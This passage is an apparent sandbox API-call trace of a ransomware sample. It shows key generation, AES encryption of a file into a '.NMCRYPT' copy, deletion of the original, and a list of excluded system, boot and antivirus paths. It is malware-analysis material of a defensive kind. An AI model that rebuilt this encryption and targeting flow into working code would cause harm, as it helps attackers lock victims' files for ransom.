hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.013] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0165.014] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0165.014] CryptCreateHash (in: hProv=0x8e3110, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x2923f2c | out: phHash=0x2923f2c) returned 1 [0165.014] CryptHashData (hHash=0x9ad2b8, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0165.014] CryptDeriveKey (in: hProv=0x8e3110, Algid=0x6610, hBaseData=0x9ad2b8, dwFlags=0x4, phKey=0x2923f30 | out: phKey=0x2923f30*=0x9ad2f8) returned 1 [0165.014] CryptSetKeyParam (hKey=0x9ad2f8, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0165.014] CryptSetKeyParam (hKey=0x9ad2f8, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0165.014] wcslen (_String="\\\\?\\") returned 0x4 [0165.014] CryptDuplicateKey (in: hKey=0x9ad2f8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad8b8) returned 1 [0165.014] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.htm.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.htm.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd68 [0165.015] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd6c [0165.015] GetFileSizeEx (in: hFile=0xd6c, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=233) returned 1 [0165.015] WriteFile (in: hFile=0xd68, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0165.016] ReadFile (in: hFile=0xd6c, lpBuffer=0x2895990, nNumberOfBytesToRead=0xe9, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0xe9, lpOverlapped=0x0) returned 1 [0165.016] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0xe9, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0xf0) returned 1 [0165.017] GetLastError () returned 0x0 [0165.017] WriteFile (in: hFile=0xd68, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0xf0, lpOverlapped=0x0) returned 1 [0165.080] ReadFile (in: hFile=0xd6c, lpBuffer=0x2895990, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0165.080] WriteFile (in: hFile=0xd68, lpBuffer=0x2895990*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0165.080] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.htm")) returned 0x20 [0165.080] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.htm", dwFileAttributes=0x20) returned 0 [0165.081] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.htm") returned 1 [0165.081] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.htm")) returned 0 [0165.081] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.htm" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.htm") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.htm" [0165.081] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.htm" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery") returned 1 [0165.081] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF84B.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf84b.tmp")) returned 0xf84b [0165.082] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.htm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF84B.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf84b.tmp"), dwFlags=0x1) returned 0 [0165.082] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF84B.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf84b.tmp")) returned 1 [0165.083] CryptDestroyKey (hKey=0x9ad8b8) returned 1 [0165.083] wcslen (_String="OK") returned 0x2 [0165.083] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0165.083] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0165.083] CryptDestroyKey (hKey=0x9ad2f8) returned 1 [0165.083] CryptDestroyHash (hHash=0x9ad2b8) returned 1 [0165.083] CryptReleaseContext (hProv=0x8e3110, dwFlags=0x0) returned 1 [0165.083] FindNextFileW (in: hFindFile=0x9ad238, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0165.083] PathMatchSpecW (pszFile="Roses.jpg", pszSpec="*NMCRYPT") returned 0 [0165.083] PathMatchSpecW (pszFile="Roses.jpg", pszSpec="*Recovers your files.html") returned 0 [0165.083] PathMatchSpecW (pszFile="Roses.jpg", pszSpec="*.exe") returned 0 [0165.083] PathMatchSpecW (pszFile="Roses.jpg", pszSpec="*.dll") returned 0 [0165.083] PathMatchSpecW (pszFile="Roses.jpg", pszSpec="*.lnk") returned 0 [0165.083] PathMatchSpecW (pszFile="Roses.jpg", pszSpec="*.bat") returned 0 [0165.083] PathMatchSpecW (pszFile="Roses.jpg", pszSpec="*.ini") returned 0 [0165.083] PathMatchSpecW (pszFile="Roses.jpg", pszSpec="*.msi") returned 0 [0165.083] PathMatchSpecW (pszFile="Roses.jpg", pszSpec="*.scf") returned 0 [0165.083] PathMatchSpecW (pszFile="Roses.jpg", pszSpec="*pagefile.sys*") returned 0 [0165.083] PathMatchSpecW (pszFile="Roses.jpg", pszSpec="*NTUSER.DAT*") returned 0 [0165.083] PathMatchSpecW (pszFile="Roses.jpg", pszSpec="*AppData*") returned 0 [0165.083] PathMatchSpecW (pszFile="Roses.jpg", pszSpec="*\\winrar\\*") returned 0 [0165.083] PathMatchSpecW (pszFile="Roses.jpg", pszSpec="*\\Internet Explorer\\*") returned 0 [0165.083] PathMatchSpecW (pszFile="Roses.jpg", pszSpec="*\\java\\*") returned 0 [0165.083] PathMatchSpecW (pszFile="Roses.jpg", pszSpec="*\\TeamViewer\\*") returned 0 [0165.083] PathMatchSpecW (pszFile="Roses.jpg", pszSpec="*\\windows\\*") returned 0 [0165.083] PathMatchSpecW (pszFile="Roses.jpg", pszSpec="*\\ESET\\*") returned 0 [0165.083] PathMatchSpecW (pszFile="Roses.jpg", pszSpec="*\\AVG\\*") returned 0 [0165.083] PathMatchSpecW (pszFile="Roses.jpg", pszSpec="*\\AVIRA\\*") returned 0 [0165.083] PathMatchSpecW (pszFile="Roses.jpg", pszSpec="*\\AVAST Software\\*") returned 0 [0165.083] PathMatchSpecW (pszFile="Roses.jpg", pszSpec="*Atheros*") returned 0 [0165.083] PathMatchSpecW (pszFile="Roses.jpg", pszSpec="*Realtek*") returned 0 [0165.083] PathMatchSpecW (pszFile="Roses.jpg", pszSpec="*bootmgr*") returned 0 [0165.083] PathMatchSpecW (pszFile="Roses.jpg", pszSpec="*boot*") returned 0 [0165.083] PathMatchSpecW (pszFile="Roses.jpg", pszSpec="*boot*") returned 0 [0165.083] PathMatchSpecW (pszFile="Roses.jpg", pszSpec="*CONFIG.SYS*") returned 0 [0165.083] PathMatchSpecW (pszFile="Roses.jpg", pszSpec="*IO.SYS*") returned 0 [0165.083] PathMatchSpecW (pszFile="Roses.jpg", pszSpec="*MSDOS.SYS*") returned 0 [0165.083] PathMatchSpecW (pszFile="Roses.jpg", pszSpec="*NTDETECT.COM*") returned 0 